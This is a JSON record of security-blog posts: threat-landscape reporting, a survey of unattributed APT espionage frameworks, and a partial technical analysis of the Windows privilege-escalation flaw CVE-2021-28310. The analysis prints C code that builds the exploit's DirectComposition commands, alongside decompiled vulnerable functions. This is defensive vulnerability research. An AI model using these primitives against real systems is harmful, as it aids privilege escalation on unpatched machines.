attractive to their partners.\n\nThe banking Trojan families are seeking to innovate by using DGA (Domain Generation Algorithm), encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks to obstruct analysis and detection. We believe that these threats will evolve to target more banks in more countries.\n\nWe recommend that financial institutions monitor these threats closely, while improving their authentication processes, boosting anti-fraud technology and threat intelligence data to understand and mitigate such risks. Further information on these threats, along with IoCs, YARA rules and hashes, are available to customers of our [Financial Threat Intelligence services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).\n\n### The dangers of streaming\n\nHome entertainment is changing as the adoption of streaming TV services increases. The global market for streaming services is [estimated to reach $688.7 billion by 2024](<https://www.businesswire.com/news/home/20200205005541/en/Global-Video-Streaming-Market-Estimated-Generate-688.7>). For cybercriminals, the widespread adoption of streaming services offers new, potentially lucrative attack vector. For example, just hours after Disney + was launched last November, [thousands of accounts were hacked](<https://www.zdnet.com/article/thousands-of-hacked-disney-accounts-are-already-for-sale-on-hacking-forums/>) and people's passwords and email details were changed. The criminals sold the compromised accounts online for between $3 and $11.\n\nEven established services, such as Netflix and Hulu, are prime targets for distributing malware, [stealing passwords](<https://www.usatoday.com/story/tech/columnist/2019/08/31/did-someone-steal-your-netflix-password/2168504001/>) and launching spam and phishing attacks. The spike in the number of subscribers in the wake of the COVID-19 pandemic has provided cybercriminals with an even bigger pool of potential victims. In the first quarter of this year, [Netflix added fifteen million subscribers](<https://www.theverge.com/2020/4/21/21229587/netflix-earnings-coronavirus-pandemic-streaming-entertainment%5d>)\u2014more than double what had been anticipated.\n\nWe took an [in-depth look at the threat landscape as it relates to streaming services](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>). Unsurprisingly, phishing is one of the approaches taken by cybercriminals, as they seek to trick people into disclosing login credentials or payment information.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15124324/sl_tv_report_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15124324/sl_tv_report_06.png>)\n\nThe criminals also capitalize on the growing interest in streaming services to distribute malware and adware. Typically, backdoors and other Trojans are downloaded when people attempt to gain access through unofficial means \u2013 by purchasing discounted accounts, obtaining a 'hack' to keep their free trial going, or attempting to access a free subscription. The chart below shows the number of people that encountered various threats containing the names of popular streaming platforms while trying to access these platforms through unofficial means between January 2019 and 8 April 2020:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15134838/01-en-graph-depicting.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15134838/01-en-graph-depicting.png>)\n\nThe chart below shows the mix of malicious programs disguised under the name of popular streaming platforms between January 2019 and 8 April 2020:\n\nYou can read the full report [here](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>), including our guidance on how to avoid phishing scams and malware related to streaming services.\n\n### Threats facing digital education\n\nOnline learning became the norm in the wake of the COVID-19 pandemic, as classrooms and lecture theatres were forced to close. Unfortunately, many educational institutions did not have proper cyber-security measures in place, putting online classrooms at increased risks of cyber-attacks. On 17 June, Microsoft Security Intelligence reported that the [education industry accounted for 61 percent of the 7.7 million malware encounters by enterprises](<https://edtechmagazine.com/k12/article/2020/06/cyberattacks-increasingly-threaten-schools-heres-what-know-perfcon>) in the previous 30 days \u2013 more than any other sector. In addition to malware, educational institutions also faced an increased risk of data breaches and violations of student privacy.\n\nWe recently published an overview of the threats facing schools and universities, including phishing related to online learning platforms and video conferencing applications, threats camouflaged as applications related to online learning and DDoS (Distributed Denial of Service) attacks affecting education.\n\nIn the first half of 2020, 168,550 people encountered various threats disguised as popular online learning platforms \u2013 a massive increase compared to just 820 in the same period the previous year.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104901/02-en-education-report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104901/02-en-education-report.png>)\n\nThe platform used most frequently as a lure was Zoom, with 99.5 per cent of detections, no surprise given the popularity of this platform.\n\nThe overwhelming majority of threats distributed under the guise of legitimate video conferencing and online learning platforms were riskware and adware. Adware bombards users with unwanted adverts, while riskware consists of various files \u2013 including browser bars, download managers and remote administration tools \u2013 that may carry out various actions without consent.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104938/03-en-education-report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104938/03-en-education-report.png>)\n\nIn Q1 2020, the total number of DDoS attacks increased globally by 80 per cent when compared to the same period in 2019: and a large proportion of this increase can be attributed to attacks on distance e-learning services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03105019/04-en-education-report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03105019/04-en-education-report.png>)\n\nThe number of DDoS attacks affecting educational resources that occurred between January and June this year increased by at least 350 per cent when compared to the same period in 2019.\n\nIt's likely that online learning will continue to grow in the future and cybercriminals will seek to exploit this. So it's vital that educational institutions review their cyber-security policy and adopt appropriate measures to secure their online learning environments and resources.\n\nYou can read our full report [here](<https://securelist.com/digital-education-the-cyberrisks-of-the-online-classroom/98380/>).\n\n### Undeletable adware on smartphones\n\nWe've highlighted the issue of intrusive advertisements on smartphones a number of times in the past (you can find recent posts [here](<https://securelist.com/dropper-in-google-play/92496/>) and [here](<https://securelist.com/in-app-advertising-in-android/97065/>)). While it can be straightforward to remove [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), there are situations where it's much more difficult because the [adware is installed in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). In such cases, trying to remove it can cause the device to fail. In addition, ads can be embedded in undeletable system apps and libraries at the code level. According to our data, 14.8 per cent of all users attacked by malware or adware in the last year suffered an infection of the system partition.\n\nWe have observed two main strategies for introducing undeletable adware onto a device. First, the malware obtains root access and [installs adware in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). Second, the code for displaying ads (or its loader) gets into the firmware of the device even before reaches the consumer. Our data indicates that between one and 5 per cent people running our mobile security solutions have encountered this. In the main, these are owners of smartphones and tablets of certain brands in the lower price segment. For some popular vendors offering low-cost devices, this figure reaches 27 per cent.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/30143828/sl_pre-installed_ads_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/30143828/sl_pre-installed_ads_01.png>)\n\nSince the Android security model assumes that anti-virus is a normal app, it is unable to do anything [adware or malware in system directories](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>), making this a serious problem.\n\nOur investigations show that the focus of some mobile device suppliers is on maximizing profits through all kinds of advertising tools, even if such tools cause inconvenience to device owners. If advertising networks are ready to pay for views, clicks, and installations regardless of their source, it makes sense for them to embed ad modules into devices to increase the profit from each device sold.", "cvss3": {}, "published": "2020-11-20T10:00:58", "type": "securelist", "title": "IT threat evolution Q3 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-11-20T10:00:58", "id": "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "href": "https://securelist.com/it-threat-evolution-q3-2020/99382/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-10T08:05:03", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/07093719/abstract_threat_actor_attribution-990x400.jpg)\n\nTargeted attack attribution is always a tricky thing, and in general, we believe that attribution is best left to law enforcement agencies. The reason is that, while in 90% of cases it is possible to understand a few things about the attackers, such as their native language or even location, the remaining 10% can lead to embarrassing attribution errors or worse. High-profile actors make every effort to stay undetected inside the victim's infrastructure and to leave as few traces as they can. They implement a variety of techniques to make investigation of their campaigns more difficult. Using LOLBINS, common legitimate pentesting tools, and fileless malware; misleading security researchers by placing false flags\u2014these and other anti-forensic tricks often make threat attribution a matter of luck. That is why there is always a percentage of targeted attacks that remain unattributed for years. Recently, I shared [my TOP 10 list of the most mysterious APT](<https://twitter.com/craiu/status/1573272440704319488>) campaigns/tools on Twitter. In this article, I provide a bit more detail on each case.\n\n## 1\\. Project TajMahal\n\nIn late 2018, we discovered a sophisticated espionage framework, which we dubbed "[TajMahal](<https://securelist.com/project-tajmahal/90240/>)". It consists of two different packages, self-named "Tokyo" and "Yokohama", and is capable of stealing a variety of data, including data from CDs burnt on the victim's machine and documents sent to the printer queue. Each package includes a number of malicious tools: backdoors, keyloggers, downloaders, orchestrators, screen and webcam grabbers, audio recorders, and more. In total, up to 80 malicious modules were discovered.\n\nProject TajMahal had been active for at least five years before we first detected it. What makes it even more mysterious is that its only known victim is a high-profile diplomatic entity. Who was behind the attack, if there were any other victims, or whether the whole toolset was developed to penetrate just one organization\u2014these questions remain unanswered.\n\n## 2\\. DarkUniverse\n\nDarkUniverse is [another APT framework](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>) we discovered and reported on in 2018. It was active in the wild for at least for eight years\u2014from 2009 to 2017\u2014and targeted at least 20 civilian and military entities in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus, and the United Arab Emirates. The malware spreads through spear-phishing emails with a malicious Microsoft Office document as attachment. It consists of several modules responsible for different espionage activities such as keylogging, mail traffic interception, making screenshots, collecting of a wide variety of system information, and more.\n\nThe only prominent case of DarkUniverse being spotted in the wild was when their [sophisticated ItaDuke malware](<https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/>) was dropped with a zero-day PDF exploit conspicuously named "Visaform Turkey.pdf". DarkUniverse remains unattributed, and it is unclear what happened to the actor after 2017.\n\n## 3\\. PuzzleMaker\n\nIn April 2021, we [detected several targeted attacks](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) using a complex chain of zero-day exploits. To penetrate the system, the actor used a Google Chrome RCE vulnerability. We were not able to obtain the exploit, but suspected the flaw in question was [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>), which enabled an attacker to execute arbitrary code inside the browser sandbox. Once inside, the actor exploited [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), an information disclosure vulnerability in the Windows kernel, to obtain the kernel address of the EPROCESS structure, and elevated privileges using one more Windows kernel flaw, [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>).\n\nAfter successful exploitation of these vulnerabilities, custom malware consisting of four modules is delivered to the infected system. The modules are a stager, dropper, service, and remote shell, with the last one being the final payload. We dubbed the APT "PuzzleMaker".\n\nThe only weak link to known APT campaigns is a post-exploitation technique that is used both by PuzzleMaker and the CHAINSHOT malware, and by at least two state-sponsored threat actors. However, the technique is publicly known and can be used by various groups independently.\n\n## 4\\. ProjectSauron (aka Strider)\n\nProjectSauron was [first discovered](<https://securelist.com/faq-the-projectsauron-apt/75533/>) in September 2015, when [Kaspersky Anti-Targeted Attack Platform](<https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform>) detected anomalous network traffic in a customer organization. The traffic originated from a suspicious library loaded into the memory of a domain controller server and registered as a Windows password filter, which has access to plain-text passwords to administrative accounts. It proved to be a part of a complex APT platform targeting government, telecommunication, scientific, military, and financial organizations in Russia, Iran, Rwanda, and possibly, Italian-speaking countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png>)\n\n**_ProjectSauron got its name from the "Sauron" mentioned in its configuration_**\n\nThe ProjectSauron platform has a modular structure. Its core implants are unique to each victim, with different file names and sizes, and timestamps tailored to the target environment. This way, the artifacts discovered in one organization are of low value to other victims. These core implants act as backdoors that download additional modules and run commands inside the memory. The modules perform specific espionage functions, such as keylogging, stealing documents, or hijacking encryption keys from infected computers and attached USB devices. A special module is responsible for accessing air-gapped systems through infected USB drives.\n\nThe threat actor behind ProjectSauron uses a complex command-and-control infrastructure involving a wide range of different ISPs and a number of IP-addresses across US and Europe. The actor made every possible effort not to create recognizable patterns in its operations. The only thing that can be said with confidence is that this level of sophistication is hardly achievable without a nation-state sponsor. It is also worth noting that the actor probably learned from other high-profile APTs, such as [Duqu](<https://securelist.com/the-mystery-of-duqu-part-ten/32668/>), [Flame](<https://securelist.com/the-flame-questions-and-answers/34344/>), [Equation](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), and [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02-1024x675.gif)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02.gif>)\n\n## 5\\. USB Thief\n\nIn 2016, our colleagues at ESET [discovered a type of USB malware](<https://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/>) that featured a tricky self-protection mechanism. Dubbed "USB Thief", it consisted of six files, two of which were configuration files, while the other four were executables. The files were designed to be executed in a pre-defined order, and some of them were AES128-encrypted. The encryption key was generated using a unique USB device ID and certain disk properties. This made it hard to decrypt and run the files anywhere but on the infected USB drive.\n\nThree of the executable files are loaders that load the next-stage file. To ensure that the files are loaded in the correct order, they use hashes of the previously loaded files as their names. Additionally, some of the files check the name of the parent process and terminate if it is wrong. The final payload is a data stealer that looks to the configuration file for information about what data to exfiltrate, how to encrypt it, and where to store. The data is always exfiltrated to a location on the infected USB device.\n\nAnother interesting technique implemented in USB Thief is using portable versions of certain applications, such as Notepad, Firefox, and TrueCrypt, to trick the user into running the first malware loader. To achieve this goal, it injects itself into the command chain of these applications as a plugin or a dynamic linked library. When the user runs the infected app, the malware launches, too. The malware is not widespread and is most likely used in highly targeted attacks involving a human asset.\n\nSince my post on Twitter, [our colleagues at ESET shared further information](<https://twitter.com/0xfmz/status/1573321520570671105>) on this toolset, which includes their suspicion that it might be associated with the Lamberts APT group:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03-1024x606.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03.png>)\n\n## 6\\. TENSHO (aka White Tur)\n\nIn early 2021, while searching for phishing pages that spoofed governmental websites, researchers at the PwC company [stumbled across a page](<https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html>) used to phish for Serbian Ministry of Defense credentials. This page led them to a previously unknown threat actor dubbed "TENSHO" or "White Tur". This actor has been active since at least 2017 and uses a variety of unique techniques and tools, which include weaponized documents, HTA and PowerShell scripts, Windows executables, and phishing pages that mimic governmental websites.\n\nAmong other tools, TENSHO uses the OpenHardwareMonitor open-source project, whose legitimate purpose is to monitor device temperature, fan speed, and other hardware health data. The threat actor spreads a malicious OpenHardwareMonitor package designed to deliver TENSHO's malware in the form of a PowerShell script or Windows binary.\n\nTo date, no ties have been discovered between this threat actor and any known APT group. TENSHO targets organizations inside Serbia and Republika Srpska (an entity in Bosnia and Herzegovina) indicating a very specific regional interest. Because many parties might be interested in targeting these regions, it is not easy to attribute the threat.\n\n## 7\\. PlexingEagle\n\nDuring the HITBSec 2017 conference in Amsterdam, Emmanuel Gadaix presented the discovery of a highly interesting GSM cyberespionage toolset, likely deployed by a very advanced threat actor, found during a routine security sweep in a client's systems.\n\n[![A Surprise Encounter With a Telco APT, by courtesy of Emmanuel Gadaix](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04-1024x569.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04.png>)\n\n**_[A Surprise Encounter With a Telco APT](<https://conference.hitb.org/hitbsecconf2017ams/materials/D2T4%20-%20Emmanuel%20Gadaix%20-%20A%20Surprise%20Encounter%20With%20a%20Telco%20APT.pdf>), by courtesy of Emmanuel Gadaix_**\n\nThe compromise was originally discovered by Gadaix' team on a Solaris 10 machine that was used by the actors as an operating base. From there, the attackers leveraged advanced knowledge of the GSM infrastructure and network to patch the functionality normally used by law enforcement for eavesdropping on phone calls in order to implement their own mechanisms for intercepting calls of interest. The malware used in the intrusion was written using LUA, a language we saw used by other advanced threat actors, such as the ones behind Flame and Project Sauron. In his presentation, Gadaix hints at a number of similarities between this case and the so-called "Athens Affair", the two being the only known cases of this threat actor actually being caught in the wild.\n\n## 8\\. SinSono\n\nIn May 2021, Syniverse, a telecom company that provides text message routing services to such carriers as At&T, Verizon, T-Mobile, and others, detected [unauthorized access to its IT systems](<https://www.theverge.com/2021/10/6/22713543/syniverse-hack-five-years-text-messages>). An internal investigation revealed that an unknown adversary first penetrated Syniverse's infrastructure in 2016. For five years they had acted undetected, accessed internal databases, and managed to compromise about 235 customers' login credentials for the company's Electronic Data Transfer (EDT) environment. Through these accounts, the threat actor could access highly sensitive consumer data, e.g., call records and the contents of text messages.\n\nWhile the company reset or inactivated credentials for all EDT customers, and contacted affected organizations, many questions remain: for instance, if the actor had actually stolen sensitive data or not. Although the company itself and some of the carriers relying on its services see no indicators of a major breach and no attempt to disrupt their processes, we know neither who the actor was nor what their goals were. Our analysis of the data related to the attack indicates a high degree of attention and care regarding operational security and ensuring that attribution is difficult.\n\n## 9\\. MagicScroll (aka AcidBox)\n\nMagicScroll is a sophisticated malicious framework that was [first detected](<https://unit42.paloaltonetworks.com/acidbox-rare-malware/>) by Palo Alto's Unit 42 in 2019. It is a type of multistage malware with only a few known samples and one known victim, located in Russia and attacked in 2017. The initial infection stage of MagicScroll is missing. The first known stage is a loader that was created as a [security support provider](<https://learn.microsoft.com/en-us/windows/win32/secauthn/custom-security-packages>), a DLL that usually provides certain security features, such as application authentication. MagicScroll abuses this functionality to achieve injection into the lsass.exe process and probably persistence as well.\n\nThe loader's main purpose is to decrypt and load the next-stage module, which is stored in the registry. This module exploits a VirtualBox driver vulnerability to load an unsigned malicious driver in kernel mode. According to Unit 42, the exploitation of this vulnerability was previously observed in [Turla](<https://securelist.com/tag/turla/>) operations, however there is no indication that the new actor has any links to that group. Unit 42 also found some loose similarities with [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>), but they stated that these are too weak for considering the two campaigns linked. Neither have we found any ties between MagicScroll and any other known APTs.\n\n## 10\\. Metador\n\nThe Metador threat actor was [first publicly described](<https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/>) by SentinelLabs in September 2022. It mainly targets ISPs, telecommunication companies, and universities in several countries in the Middle East and Africa; at least one of its victims has been attacked by nearly ten different APT groups.\n\nMetador operates two malware platforms dubbed "metaMain" and "Mafalda", which are deployed purely in memory. The metaMain platform is a feature-rich backdoor, which provides the threat actor with long-term access to the infected system. It can log keyboard and mouse events, make screenshots, download and upload files, and execute arbitrary shellcode.\n\nMafalda is a backdoor that is being actively developed. Its latest version was compiled with a timestamp of December 2021. It features a number of anti-analysis techniques and supports 67 commands, which is 13 more than in the previous version of the malware.\n\nApart from typical backdoor functionality, metaMain and Mafalda are capable of establishing connections to other (yet unknown) implants and exchange data with these. One of those implants is called "Cryshell" and acts as intermediate server between metaMain or Mafalda, and the C2. There are reasons to believe that unknown Linux implants exist that can send data collected from Linux machines to Mafalda.\n\nIt is yet to be established who the actor behind Metador is and what their goals are. The sophisticated malware designed to stay undetected for a long time suggests that this is a cyberespionage campaign by a high-end threat actor. At least some of the C2 responses are in Spanish, which may indicate that the actor or some of its developers speak Spanish. Also, some cultural references were found in Metador's malware, including British pop punk lyrics and Argentinian political cartoons. The diversity of traces makes it difficult to determine in which state's interests it operates\u2014if at all. One of the hypotheses is that the group is a high-end contractor.\n\n## Conclusion\n\nAdvanced threat actors use every possible means to stay undetected, and\u2014if caught\u2014unattributed. Every now and then, security researchers will reveal a mysterious campaign that has remained uncovered for years and that is nearly impossible to trace back to its benefactors with certitude. The ten stories described in this post are just some of the many unattributed mysteries we have seen through the years. That is why it is important to discuss them and share data on them within the cybersecurity community.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-07T10:00:47", "type": "securelist", "title": "TOP 10 unattributed APT mysteries", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2022-10-07T10:00:47", "id": "SECURELIST:8BBBF7B71E6D52B912070367475B6567", "href": "https://securelist.com/top-10-unattributed-apt-mysteries/107676/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-29T16:18:40", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/04/09094920/abstract-digital-blue-990x400.jpg)\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) to this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren't able to capture a full chain, so we don't know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.\n\n \nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We've already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string "NtDComposition".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet's take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty<D2DVector2>(\u2026) or CPropertySet::UpdateProperty<D2DVector2>(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that's not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(\u2026) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n 